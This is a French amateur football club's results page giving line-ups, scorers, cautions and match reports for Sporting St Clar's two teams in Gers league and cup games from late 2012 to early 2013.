Equipe: 1. Baptiste. Peotta, 2. W. Schoen, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. B. Sabarros, 9. L. Delavat, 10. C.Malateste, 11. A. Mouchet. Rempl: 12. S. Buttigieg, 13. R. Boukkera, 14. N. Cantaloup, Coach: J.Blancard But: Avertissements: PM.Sabarros (Obstruction), A.Virelaude (Anti-jeu), B.Sabarros (Tacle dangereux) Ce week-end l’équipe fanion du Sporting recevait Fleurance pour un derby de la Lomagne. La première mi-temps est sérieuse des deux côtés, aucune des deux équipes ne prenant de risque et ne souhaitant prendre de but. Seul St Clar sur une frappe de « Mouss » et des corners se montre dangereux. Mi-temps atteint sur le score de 0-0. Après la pause, Fleurance change de tactique et devient plus entreprenant. A la 60ème mn, l’arbitre accorde un coup franc très généreux à Fleurance au 35m plein axe, leur milieu de terrain décoche une frappe tendue qui part en lucarne, imparable pour « Bats », 0-1. 5mn après, sur une erreur défensive de St Clar, l’attaquant adverse reçoit le ballon dans les pieds, l’arbitre de touche lève son drapeau et déstabilise tout le monde sauf l’attaquant qui marque, but validé, 0-2. Les jaunes et rouges essayent de revenir au score mais c’est soit trop brouillon ou soit trop timide pour pouvoir inquiéter le gardien adverse. Et à 10mn de la fin, Fleurance vient inscrire un joli 3ème but plein d’envie. Fin du match, nouvelle défaite de l’équipe fanion. Une réaction de tous est attendue lors des prochains matchs pour ne pas avoir une grosse désillusion en fin de saison, les derniers au classement se rapprochent à grand pas…Week-end prochain déplacement chez un des cadors de la poule, Vallée de l’Arrats. Bon rétablissement à “Will” et “Raphy” blessés lors de cette renctontre.
Les joueurs au foyer du Sporting après le match
Résultat du week-end (09/03/13):
Cruelle désillusion pour la Une
Ce week-end, l’équipe fanion du Sporting était en déplacement au Houga encore une fois privé d’éléments majeurs dans son effectif…
CHAMPIONNAT D’EXCELLENCE : LE HOUGA – ST CLAR : 4-2
Equipe: 1. Baptiste Peotta, 2. A. Davasse, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin Peotta, 6. W. Schoen, 7. F. Moussaron (cap), 8. C. Suzes, 9. S. Buttigieg, 10. C. Malateste, 11. L. Fabbro, Rempl: 12. T. Hrodej, 13. J. Lasserre, 14. M. Huntz, Coach : J. Blancard. Buts: S. Buttigieg (25ème), W. Schoen (40ème) Avertissement: C. Suzes (Tacle en retard) Après leur défaite en Coupe du Gers et avec une équipe encore une fois remaniée pour causes d’absences, la une espérait se refaire la cerise chez les Folgariens. Après quelques minutes de flottement face à des locaux très joueurs, Saint-Clar se reprend et se procure quelques occasions. A la 15ème minute sur un contre, « Mouss », « Kinou » et « Stephen » combinent très bien mais « Stephen » manque de précision sur la dernière passe alors que le chemin du but était grand ouvert pour « Mouss ». Quelques instants plus tard, le même « Stephen », très actif aux abords et dans la surface, récupère un ballon dans les 6 mêtres et s’écroule au moment de frapper – pénalty ou non, l’arbitre décide que non. Mais 5 mn plus tard, c’est le Houga qui ouvre le score sur une faute de placement de notre défense. Nos joueurs repartent à l’attaque et obtiennent un coup franc excentré. « Lolo » le tire tendu au premier poteau, « Stephen » coupe bien la trajectoire et égalise d’une belle tête. C’est ensuite « Lolo » qui se charge d’un coup franc à 25m. Sa frappe limpide prend le chemin de la lucarne mais le gardien local réalise une superbe parade. Mais ce sont les locaux qui doublent la mise sur un corner suite à une grossière faute de marquage des défenseurs. Les jaune et rouge ne se laissent pas abattre et sur un corner tiré par « Cissou », c’est « Will » qui égalise de la tête. Après la pause, le match devient plus compliqué pour nos joueurs qui paient peut être les efforts du match de Mercredi. Nos joueurs sont souvent battus dans les duels, très imprécis dans leurs passes et commettent quelques fautes de marquage dont profitent les locaux pour s’imposer par 4 à 2. Il va falloir que tout le monde se reprenne très vite pour éviter une désillusion en fin de saison, que chacun reprenne confiance en soi et fasse l’effort d’être assidu et concerné et quoi de mieux que le match de Samedi contre les amis fleurantins ?
Malgré la série négative actuelle, tout l’investissement déployé par “Coach Julien” va finir par payer
Résultat de la semaine (06/03/13):
C’est fini pour le Sporting en Coupe du Gers
En ce mercredi soir, l’équipe fanion de St Clar se déplaçait à Aignan pour le compte de la Coupe du Gers. Les jaunes et rouges ont failli créer la surprise…
¼ DE FINALE DE LA COUPE DU GERS : AIGNAN – ST CLAR : 4-0
Equipe : 1. Baptiste. Peotta, 2. B. Sabarros, 3. R. Clavel, 4. P-M. Sabarros, 5. Benjamin. Peotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Cantaloup, 10. C. Malateste, 11. Loic. Fabbro. Rempl: 12. C. Suzes, 13. S. Buttigieg, 14. W. Schoen, Coach: J.Blancard But: Avertissements: A. Virelaude (Obstruction), B. Sabarros (Tacle dangereux) Tirage difficile pour les St Clarais avec ce déplacement à Aignan, surtout en semaine quand on connait les contraintes actuelles de la société, mais les jaunes et rouges ont su répondre présent pour ce rendez-vous. Le match débute timidement, les deux équipes sont bien en place, il faut attendre le quart d’heure de jeu pour voir les locaux s’offrir leur première attaque sur le côté comme à l’accoutumée mais la réception du centre est mal exploitée par l’attaquant et le tir passe au-dessus des cages de « Bats ». Dans la continuité Aignan se procure une autre belle occasion d’ouvrir la marque mais « Bats » boxe le ballon de près. St Clar pose le jeu et essaye de repartir proprement de son camp notamment par « Mouss » et « Ludo ». Les St Clarais se montrent plus entreprenant en attaque et suite à une belle remise en retrait de « Stephen », « Mous » décoche une frappe mais le ballon passe à côté des buts. On s’achemine vers la mi-temps, quand suite à un tir des jaunes et rouges le ballon est détourné par la main d’un défenseur dans la surface, l’arbitre n’accorde pas le pénalty…Mi-temps : 0-0. Après la pause des citrons, Les joueurs locaux accentuent la pression et il faut un joli réflexe de « Bats » pour détourner un ballon qui prenait la direction des buts. A la 60ème mn, suite à une déviation, « Stephen » tire et le ballon est détourné par la main d’un défenseur dans la surface, cette fois l’arbitre siffle pénalty. « Mouss » s’élance et trouve le poteau, le ballon revient sur « Benben » qui frappe mais le ballon passe à côté des buts, le tournant du match pour les St Clarais… Dans la foulée, Aignan se rue à l’attaque et un tir croisé de l’attaquant rase le poteau. Les joueurs locaux obtiennent un corner qui ne donne rien mais l’arbitre siffle un pénalty pour une soit disant poussette de « Benben »… « Bats » arrête le pénalty mais l’attaquant est plus rapide que nos défenseurs et envoie le ballon dans les filets, 1-0. A la 75 ème mn, Aignan obtient un corner, « Mous » bousculé dans le dos ne peut reprendre le ballon de la tête pour dégager son camp, l’arbitre ne dit rien, le cuir revient dans les pieds de l’attaquant qui frappe, le ballon est dévié par « Papy » dans son propre but, 2-0. Les St Clarais jouent l’attaque à fond, et Aignan dans les dernières minutes de la rencontre marquera deux autres buts anecdotiques en contre, de toute façon la messe était déjà dite… Fin du match, 4-0. Samedi retour au championnat, déplacement chez le leader à Auch pour l’équipe réserve et déplacement au Houga pour l’équipe fanion qui aura à cœur de se rattraper de la défaite du match aller sur ses terres…
Les St Clarais à l’attaque sur le terrain d’Aignan
Résultats du week-end (02/03/13):
Une victoire et une défaite pour le Sporting
Ce week-end, les équipes du Sporting recevaient les deux équipes de Labéjan. Les réservistes confirment leur forme du moment tandis que l’équipe fanion n’arrive plus à s’imposer sur son terrain.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – LABEJAN II : 3-0
Equipe : 1. L. Gamot, 2. M. Berto, 3. P. Pinto, 4. Luc. Fabbro, 5. D. Solagna, 6. V. Taupiac (Cap), 7. M. Huntz, 8. T. Hrodej, 9. A. Arroues, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. R. Clavel, 13. C. Lecoublet, 14. M. Xompero, Coach: C. Boukkera Buts: A.Arroues (7ème), (54ème), R.Clavel (67ème) Avertissement: Voulant confirmer leur bonne prestation du week-end dernier contre Aignan, les réservistes entament leur match sur les chapeaux de roues, les joueurs du Sporting confisquent le ballon, et à la 7ème mn, sur un corner de « Bono », « Arroues » d’une jolie tête envoie le ballon au fond des filets, 1-0. St Clar continue leur pressing, notamment par « Bono » et « Tom » intenable sur leur côté. Les joueurs de Labejan essayent de s’approcher des buts St Clarais, mais la défense autour d’un bon « Luc » veille et ne laisse rien passer. Les rouges et jaunes développent du beau jeu, notamment par « Arroues » très intelligent dans son jeu en appui. On se rapproche tranquillement de la mi-temps, quand « Taupi » décide d’envoyer un véritable pétard des 25m, le ballon frappe la barre et rebondit sur le gardien et file en corner malheureusement, le coup de pied de coin ne donnera rien, mi-temps. Après la pause, les joueurs du Sporting repartent sur un bon tempo, les occasions se multiplient, et suite à un cafouillage dans la surface, « Arroues » tire en force et trouve le cadre, 2-0. St Clar confisque le ballon, notamment au milieu de terrain avec un gros travail de « Michou ». Suite à une récupération plein axe, « Taupi » d’un joli centre décale « Raphy » côté gauche qui ne se fait pas prier pour lober le gardien sorti à sa rencontre, 3-0. La fin du match sera bien maîtrisée par les réservistes avec de belles occasions d’aggraver le score notamment par « Bono » mais la mobylette St Claraise manquait de lucidité dans son dernier geste. Victoire précieuse et interressante des jaunes et rouges avant d’affronter Auch, l’ogre de la poule le week-end prochain.
“Arroues” auteur d’un joli doublé
CHAMPIONNAT D’EXCELLENCE : ST CLAR – LABEJAN : 0-1
Equipe : 1. Baptiste. Peotta, 2. W. Schoen, 3. R. Boukkera, 4. F. Larribeau, 5. Benjamin. Peotta, 6. B. Sabarros, 7. C. Malateste, 8. A. Mouchet, 9. N. Cantaloup (Cap), 10. L.Delavat, 11. Loic. Fabbro. Rempl: 12. C. Suzes, 13. S. Buttigieg, 14. A. Davasse, Coach: J.Blancard But: Avertissements: Loic. Fabbro (Obstruction) Labejan ayant été défait le week-end dernier sur sa pelouse, venait à St Clar le couteau entre les dents. Et dès les premières minutes on a pu s’en apercevoir, suite à un centre devant le but, les visiteurs sont tout près d’ouvrir le score, mais le ballon passe au-dessus des cages de « Bats ». Nos jaunes et rouges sont maladroits techniquement et ont beaucoup de mal à se trouver. Et c’est encore Labejan qui est tout près d’ouvrir le score, mais la frappe de l’attaquant passe à côté. La seule véritable occasion des locaux dans cette première mi-temps est à mettre au profit de « Benben » qui voit son tir en lucarne détourné par le gardien au dernier moment. Mi-temps, 0-0. Au retour des vestiaires, St Clar pousse notamment sur coup de pied arrêté, mais ni la tête de « Papy » et le tir de « Lolo » ne trouve le cadre. On s’achemine vers la fin du match quand sur une longue ouverture en profondeur de Labejan, l’attaquant récupère le ballon sur le côté, avec un peu de chance élimine son vis-à-vis et tire, « Papy » effleure le ballon et envoie le cuir dans ses propres filets, 0-1. Plus rien ne sera marqué dans le match. Nouvelle défaite des jaunes et rouges sur leur pelouse. Mercredi déplacement à Aignan pour le ¼ de finale de la Coupe du Gers et week-end prochain déplacement au Houga pour la suite du championnat en espérant un sursaut d’orgueil et d’envie lors de ces deux rencontres importantes pour la suite de la saison.
Les 22 acteurs du match sous un froid vif
Résultat du week-end (23/02/13):
Week-end mitigé pour le Sporting
Ce week-end, les deux équipes du Sporting recevaient leurs homologues d’Aignan. Les réservistes continuent leur marche en avant après leur large victoire tandis que l’équipe fanion s’incline face au leader du championnat.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – AIGNAN II : 6-2
Equipe : 1. L. Gamot, 2. M. Berto, 3. D. Solagna, 4. F. Cau, 5. C. Lecoublet, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. A. Arroues, 9. S. Jeangrand, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. P. Pinto, 13. C. Malateste, 14. M. Xompero, Coach: C. Boukkera Buts: T.Hrodej (7ème), C.Maillasson (15ème), M.Xompero (55ème), (70ème), (85ème), C.Malateste (72ème) Avertissement: Après 3 semaines de repos forcés, les réservistes retrouvaient le chemin des terrains face à une équipe d’Aignan toujours difficile à manœuvrer. Le match part sur les chapeaux de roues, les joueurs du Sporting confisquant le ballon, et à la 7ème mn, « Taupi » après un joli double contact dans la surface centre en retrait pour « Tom » qui envoie le ballon dans les filets, 1-0. St Clar continue leur pressing et sur une superbe ouverture en profondeur de « Simon », « Christo » gagne son duel face au gardien, 2-0. Par la suite, le match retombe d’intensité et juste avant la mi-temps, Aignan réduit le score et se redonne de l’espoir. Après la pause, les jaunes et rouges repartent tambour battant, mais se heurtent plusieurs fois au gardien adverse au grand dam de « Coach Bouki ». Il faut attendre la 55ème mn pour voir « Tom » offrir sur un plateau à « Micka » le 3ème but du match, 3-1. Quelques minutes après, Aignan obtient et transforme un pénalty logique après une faute dans la surface, 3-2. Le doute s’installe au sein des réservistes et il faut un arrêt réflexe du pied de « Lolo » pour éviter le pire. « Kinou » de retour de blessure fait son entrée et prend le jeu St Clarais à son compte. Et dans les minutes suivantes sur une chevauchée côté gauche de « Mat », « Micka » idéalement servi, vient battre le gardien de près, 4-2. Sur l’engagement, « Tom » sert « Kinou » dans la surface qui ne se fait pas prier pour marquer, 5-2. Et à 5mn de la fin, « Micka » y va de son triplé en marquant d’un lob des 20m, 6-2. Fin du match. Un bon résultat pour les réservistes qui restent au contact des premiers du championnat, de bonne augure avant la réception de Labéjan le week-end prochain…
“Mat et Micka” la doublette gagnante sur le 4ème but du match
CHAMPIONNAT D’EXCELLENCE : ST CLAR – AIGNAN : 1-3
Equipe : 1. Baptiste. Peotta, 2. P-M. Sabarros, 3. R. Clavel, 4. F. Larribeau, 5. Benjamin. Peotta, 6. B. Sabarros, 7. F. Moussaron (Cap), 8. C. Suzes, 9. N. Cantaloup, 10. L.Delavat, 11. L. Fabbro. Rempl: 12. M. Huntz, 13. S. Buttigieg, 14. A. Davasse, Coach: J.Blancard But: Benj.Péotta (60ème) Avertissement: Face au leader du championnat, les St Clarais avaient à cœur de faire un bon résultat. Le début du match commence sur un petit rythme peut-être dû au froid, les deux équipes ne prenant aucun risque. Les fautes techniques se multipliant de part et d’autre. Les joueurs du Sporting appuient leurs attaques notamment par « Nico » et « Ludo » mais la défense adverse veille. Et à la demi-heure de jeu sur une attaque rapide, Aignan ouvre le score, 0-1. Les jaunes et rouges se montrent dangereux par « Nico » mais rien ne passe. Et juste avant la mi-temps, Aignan marque le but du break d’un tir en force de près, imparable, 0-2. Après la pause des citrons, les St Clarais reviennent avec de meilleures intentions et rentrent enfin dans le match et suite à un corner de « Lolo », « Papy » d’une tête au deuxième poteau envoie le ballon dans les filets, 1-2. « Coach Julien » joue le tout pour le tout et fait rentrer un autre attaquant. Les joueurs locaux se lancent à l’attaque, et suite à une déviation, « Stephen » hérite d’un ballon dans la surface et tente un joli tir du gauche en déséquilibre mais le gardien adverse détourne le ballon au dernier moment. Les joueurs d’Aignan procèdent en contre et sur l’un d’eux à quelques minutes de la fin suite à une erreur défensive, ils marquent le 3ème but, 1-3. Plus rien ne sera marqué dans cette partie. Week-end prochain réception de Labéjan au Stade de Labarthète.
« Papy » auteur de la réduction du score
Résultat du week-end (03/02/13):
Week-end marqué sous le signe de la solidarité pour le Sporting
Ce week-end, les deux équipes du Sporting se déplaçaient à Eauze…avec pas moins de 10 absents pour raisons diverses (2 suspendus, 4 blessés, 4 autres…) pour le groupe de la I et à noter aussi 6 absents pour le groupe de la II, voilà de quoi partir déstabilisé…
CHAMPIONNAT DE 1ère DIVISION : EAUZE II – ST CLAR II : 4-1
Equipe : 1. G. Lauriti, 2. P. Pinto, 3. D. Solagna, 4. F. Cau, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. J. Lasserre, 9. F. Gobatto, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. M. Xompero, 13. C. Boukkera, Coach: C. Boukkera But: F.Cau (45ème) Avertissements: F. Cau (Faute grossière), T. Larribeau (Faute dangereuse) Face au leader de la poule, les jaunes et rouges amoindris débutent bien leur match, « Bono » est le premier à se mettre en action sur son côté, s’ensuit plusieurs minutes d’observation. Les St Clarais bien en place défensivement concèdent peu d’occasions et ressortent parfaitement le ballon. Et à la 25 ème minute, sur leur première véritable occasion Eauze ouvre la marque suite à un centre tendu devant le but, l’attaquant local dans un angle fermé tire sur « Titi » qui malheureusement trompe « Pastille » gardien du soir. 1-0. 5mn après, les joueurs locaux doublent la mise sur un corner rentrant, 2-0. Les joueurs du Sporting ne sont pas loin de réduire la marque par « Titi » qui tente un tir de 45m mais le gardien s’y prend à deux fois pour stopper le ballon. A 5mn de la mi-temps, sur un coup franc qui tape la barre et rebondit sur la ligne, les joueurs locaux sont les plus rapides pour pousser le ballon au fond des filets, 3-0. Toucher dans leur orgueil, St Clar réduit la marque juste avant la mi-temps, sur un joli coup franc de « Tom » joué au deuxième poteau pour « Faby » qui d’une tête lobée redonne espoir aux siens, 3-1, mi-temps. Après la pause des citrons, malgré un terrain lourd et la fatigue, les jaunes et rouges se créent plusieurs occasions, notamment par leur capitaine « Taupi » d’un tir au 25m et « Bono » sur coup franc. A 10mn de la fin, sur une percée plein axe de l’infatigable « Bono » qui décale « Micka », rentré en jeu auparavant, il se retrouve face au gardien mais celui-ci d’un étonnant réflexe détourne le ballon du cadre. Et à 5mn de la fin sur une attaque rapide, l’attaquant local après plusieurs contres favorables vient tromper « Pastille » de près, 4-1. Plus rien ne sera marqué dans cette partie. Malgré une équipe amoindrie, les joueurs du Sporting n’ont pas à rougir de ce résultat, ils ont montré beaucoup de solidarité et d’envie tout au long du match, de bonne augure avant la réception de Labéjan le week-end prochain si le temps le permet…
“ Faby ” auteur d’un excellent match et de son 1er but de la saison
CHAMPIONNAT D’EXCELLENCE : EAUZE – ST CLAR : 1-2
Equipe : 1. Baptiste. Peotta, 2. C. Suzes, 3. M. Berto, 4. F. Larribeau, 5. Benjamin. Peotta, 6. W. Schoen, 7. F. Moussaron (Cap), 8. A. Mouchet, 9. N. Cantaloup, 10. S. Buttigieg, 11. L. Fabbro. Rempl: 12. M. Huntz, 13. C. Boukkera, Coach: J.Blancard Buts : N.Cantaloup (30ème), (60ème) Avertissement: C. Suzes (Tacle dangereux) Face à une équipe en besoin de points, St Clar attaque ce match prudemment. Resserrée autour d’une défense bien en place et agressive sur le porteur du ballon, Eauze n’a que peu d’action de but. Les joueurs du Sporting se créent la première occasion du match mais le tir de « Stephen » est bien détourné par le gardien. Eauze réplique, mais la tête de l’attaquant est bien stoppée par « Bats ». « Mouchet » et « Lolo » jouent de leurs dribbles pour essayer de déstabiliser la défense mais rien ne passe. Il faut attendre la demi-heure de jeu pour voir « Nico » récupéré du dos un ballon plein axe, accélérer, se défaire des deux défenseurs centraux et venir dribbler le gardien pour ensuite pousser le ballon du gauche au fond des filets, 0-1. Eauze prend possession du ballon et du jeu, « Bats » est tout d’abord sauvé par sa barre sur une frappe lointaine, puis ensuite un tir de l’attaquant local qui rase le poteau. La mi-temps est sifflée au bon moment. Après la pause, Eauze repart tambour battant, « Bats » d’un joli réflexe détourne une frappe puissante des 20m. Les corners se multiplient mais « Bats » et la charnière « Papy – Fabien » ne laissent que des miettes aux attaquants. Les joueurs du Sporting évoluent en contre et sur un ballon en profondeur « Stephen » est crocheté par le défenseur au 25m, coup franc que « Nico » se charge de déposer en lucarne, imparable, 0-2. Les jaunes et rouges gèrent tranquillement leur avance mais à 10 mn de la fin sur une perte de balle plein axe, le milieu de terrain d’Eauze envoie une frappe flottante des 25m dans les buts de « Bats ». Juste après « Nico » dans un rush dont il a le secret est tout près d’inscrire un triplé mais sa frappe en coin passe au-dessus des buts. La fin de rencontre sera longue et difficile, « Cissou » pris de fortes crampes c’est « Coach Bouki » qui rentre en jeu en tant qu’attaquant pour aider ses copains de la une à tenir le résultat, assez de temps pour lui pour montrer son art du petit pont aux défenseurs locaux. Malgré une fin de match tendue dû aux fautes à répétition des joueurs d’Eauze non sanctionnées par l’arbitre, les St Clarais ramènent 4 points précieux de ce déplacement. Les 4 points de la solidarité d’un groupe… Week-end prochain réception de Labéjan au Stade de Labarthète.
” Nico” auteur d’un joli doublé
Résultat du week-end (13/01/13):
Week-end mitigé pour le Sporting
CHAMPIONNAT DE 1ère DIVISION : VAL D’ARROS II – ST CLAR II : 0-1
Equipe : 1. L. Gamot, 2. P. Patrick, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. D. Solagna, 8. M. Huntz, 9. F. Gobatto, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. A. Arroues, 13. C. Boukkera, Coach: C. Boukkera But: C.Maillasson (45ème) Avertissement:
CHAMPIONNAT D’EXCELLENCE : VAL D’ARROS – ST CLAR : 1-0
Résultat du week-end (05/01/13):
Reprise victorieuse pour l’équipe I
Ce week-end l’équipe fanion du Sporting était la première équipe à reprendre le chemin des terrains après la trêve de Noël, un match en retard compliqué l’attendait à Simorre…
CHAMPIONNAT D’EXCELLENCE : SIMORRE – ST CLAR : 0-3
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. C. Suzes, 9. L. Delavat, 10. S. Jeangrand, 11. R. Boukkera. Rempl: 12. W. Schoen, 13. M. Berto, 14. N. Cantaloup, Coach: J.Blancard Buts : F.Moussaron (55ème) (65ème), L.Delavat (60ème) Avertissements: A.Davasse (contestation), R.Boukkera (Expulsion) Pour ce match en retard, l’entame est toute à l’avantage des locaux qui, par leur pressing très agressif, étouffent complètement les Saint-Clarais et se procurent trois grosses occasions. Sur deux d’entre elles, « Bats » réussit à détourner les frappes et sur la 3ème, il est sauvé par son poteau. La suite de la première période sera quasiment identique avec une équipe de Simorre qui gagne tous les duels et des visiteurs qui semblent impuissant face à cette fougue. La pause est atteinte sur un score vierge 0 à 0 quasi-miraculeux pour les jaunes et rouges. La seconde période démarre sur le même tempo jusqu’à la 55ème minute où, suite à un contre saint-clarais mené par « Ludo », « Nico » est accroché par le gardien et obtient un pénalty transformé par “Mouss”. Ce but inespéré redonne de l’allant aux Saint-Clarais et suite à un tir de « Nico » repoussé par le gardien, « Ludo » double la mise d’une superbe frappe. A la 65ème minute, « Mouss », le facétieux capitaine, surprend tout le monde, y compris le gardien adverse, en tirant rapidement un coup-franc à la limite de la surface. Ce 3ème but, mal vécu par certains joueurs locaux, entrainera une brêve échauffourée qui se soldera par l’expulsion d’un joueur de chaque camp. La fin du match sera beaucoup plus calme avec des Saint-Clarais qui géreront sereinement leur avance. Cette victoire permet aux joueurs de l’équipe fanion de se replacer à la 3ème place à 3 points du leader Aignan. Dimanche prochain, déplacement à Val d’Arros pour les 2 équipes. Les dirigeants et joueurs du Sporting dédient cette victoire à leur copain Arnaud Cazeneuve, joueur de Fleurance, victime d’un grave accident. Courage à toi, Arnaud !
“Mouss” actuellement meilleur buteur du Sporting avec 8 buts
Résultat du week-end (22/12/12):
1/8ème de Finale de la Coupe du Gers : ST CLAR – MONFORT: 6-1
Equipe : 1. Bap. Péotta, 2. A. Davasse, 3. R. Clavel, 4. Benj. Péotta, 5. PM. Sabarros, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. L. Delavat, 9. S. Jeangrand, 10. C. Malateste, 11. L. Fabbro. Rempl: 12. S. Buttigieg, 13. M. Berto, 14. N. Cantaloup, Coach: J. Blancard Buts: L.Fabbro (9ème,79ème), F.Moussaron (18ème,85ème), A.Virelaude (30ème), C.Malateste (88ème) Avertissements: S.Jeangrand (Geste d’humeur) Pour ce tour de Coupe du Gers, les joueurs du Sporting recevait sur leur terrain, l’équipe de Monfort qui évolue une division en dessous. Les St Clarais sont les premiers à se mettre en action et au bout de 10mn de jeu, sur un tir de « Palof » mal réceptionné par le gardien adverse, « Lolo » en renard des surfaces en profite pour envoyer le ballon au fond des filets, 1-0. Les rouges et noirs continuent leur pressing, « Mouss » rate son face à face, mais récupère le ballon détourné par le gardien sur le côté, repique dans l’axe et avec l’aide du poteau arrive à marquer le 2ème but du match, 2-0. S’ensuit une petite domination des visiteurs mais « Bats » effectue deux beaux arrêts. A la demi-heure de jeu « Palof » tout en force, pénètre dans la surface et vient marquer le but du break, 3-0. Et à l’approche de la mi-temps sur une erreur défensive des joueurs du Sporting, l’attaquant adverse vient redonner espoir à son équipe en réduisant le score d’un tir croisé, 3-1, mi-temps. Au retour des vestiaires, une rencontre plus brouillonne va nous être offerte, il faudra attendre le dernier quart d’heure de jeu pour voir « Lolo » s’offrir un doublé d’un beau pointu au 18m, 4-1. A 5mn de la fin, suite à un corner mal renvoyé par Monfort « Mouss » ira aussi de son doublé en envoyant une reprise tendue en pleine lucarne, 5-1. « Kinou » clôturera la marque sur un joli service de « Stephen », 6-1. Qualification pour les ¼ de Finale de la Coupe du Gers qui opposera les joueurs du Sporting à l’équipe d’Aignan sur leur terre, un beau match en perspective. Maintenant place à la trêve. Retour sur les terrains le 5 janvier pour un match en retard à Simorre…
“Lolo et Palof” deux artisants de la victoire du Sporting contre Monfort
Résultat du week-end (16/12/12):
2 ème Tour du Challenge du District : SEISSAN II – ST CLAR II : 1-2
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. R. Boukkera, 8. T. Hrodej, 9. A. Mouchet, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. P. Pinto, 13. A. Arroues, 14. M. Xompero, Coach: C. Boukkera Buts: C.Maillasson (10ème), A.Arroues (70ème) Avertissement: A.Mouchet (Contestation) Pour ce tour de Challenge du District, les joueurs du Sporting se déplaçaient sur le terrain de Seissan, une équipe évoluant une division en dessous. Les St Clarais sont les premiers à se mettre en action et au bout de 10mn de jeu, sur une jolie action du revenant « Mouchet », « Christo » trouve le chemin des filets, 0-1. Les rouges et jaunes continuent leur pressing et les occasions vont se multiplier mais nos attaquants feront preuve de maladresse devant le but. Et à l’approche de la mi-temps vu que noël est pour bientôt, « Lolo » décida de faire un cadeau à l’attaquant de Seissan, 1-1, toujours généreux ce « Lolo ». La mi-temps sera sifflée sur ce score de parité. Après une mise au point de coach « Bouki », les joueurs du Sporting reviennent sur le terrain avec de nouvelles intentions, mais la malchance et la maladresse sont toujours au rendez-vous, il faut attendre les 20 dernières minutes de jeu pour voir enfin « Antho Arroues » récupéré un ballon relâché par le gardien adverse pour venir marquer le deuxième but du match et ouvrir son compteur but sous ses nouvelles couleurs. Plus rien ne sera marqué jusqu’à la fin du match. Qualification des réservistes pour le prochain tour du Challenge. Maintenant place à la trêve. Retour sur les terrains au mois de janvier, sans oublier les entraînements hebdomadaires du mardi et vendredi…
Notre Co-Président “JJ” toujours bien couvert aux bords des terrains
Résultat du week-end (01/12/12):
CHAMPIONNAT DE 1ère DIVISION: DURAN II – ST CLAR II : 0-5
Equipe : 1. G. Lauriti, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. W. Schoen, 8. T. Hrodej, 9. S. Jeangrand, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. J. Lasserre, 13. G. Maignaut, 14. F. Gobatto, Coach: C. Boukkera Buts: C.Lecoublet (15ème), S.Jeangrand (20ème), V.Lucas (25ème), C.Maillasson (30ème), M.Berto (60ème) Avertissements: C.Lecoublet (Anti jeu) Après leur élimination en Coupe des Réserves le week-end dernier, les réservistes avaient à cœur de se racheter autant au niveau de l’envie que de la manière. Chose faite lors de ce déplacement en championnat sur le terrain de Duran. D’entrée de match les « jaunes et rouges » mettent le pressing sur leur adversaire du soir, et « Bono » est le premier à se mettre en action, suivi de « Simon » mais leurs frappes passent à côté des buts. Sur une balle en profondeur des joueurs de Duran, « Pastille » sorti des buts dégage mais l’attaquant le contre, il faut toute la vigilance de « Dam » pour repousser le ballon sur la ligne. St Clar repart à l’attaque tout en développant du beau jeu et sur un corner, « Cédrik le Bordelais » pousse le ballon au fond des filets, 0-1 et premier but de « Cédrik » sous ses nouvelles couleurs. Les réservistes ne relâchent pas leurs efforts et 5mn après, « Tom » à la limite du hors-jeu, lancé sur son côté droit prend son adversaire de vitesse et sert « Simon » au deuxième poteau qui avec un peu de réussite marque le 2ème but du soir, 0-2. Après un énième ballon récupéré par la doublette « Will-Taupi » en milieu de terrain, notre capitaine lance parfaitement « Bono » en profondeur qui plein de sang-froid va ajuster le gardien de près, 0-3. Sous l’impulsion de « coach Bouki » les Saint-Clarais continuent d’attaquer et sur un coup franc excentré, « Christo » s’arrache pour récupérer un ballon dans la surface, se retourne et envoie le ballon au fond des filets, 0-4. Juste avant la mi-temps, Duran obtient un coup franc bien placé mais « Pastille » le détourne en corner qui ne donnera rien. Mi-temps : 0-4. Après la pause pâtes de fruits près du chauffage vu la température extérieure, les « jaunes et rouges » vont gérer la deuxième mi-temps tout en continuant à jouer, l’apport des remplaçants sera indéniable. A l’heure de jeu « Pampouille » dans la surface joue de sa technique et le défenseur local touche le ballon du bras, pénalty que « Matthieu » transforme, 0-5. Plus rien ne sera marqué dans cette rencontre. Résultat de bon augure avant la réception du RBA le week-end prochain pour un match de haut de tableau.
Les remplaçants du soir ont beaucoup apprécié les parkas de l’entreprise “Ligardes Bricoelec” vu la température extérieure
Résultat du week-end (24/11/12):
1/8 ème de Finale de la Coupe des Réserves : ST SAUVY II – ST CLAR II : 2-1
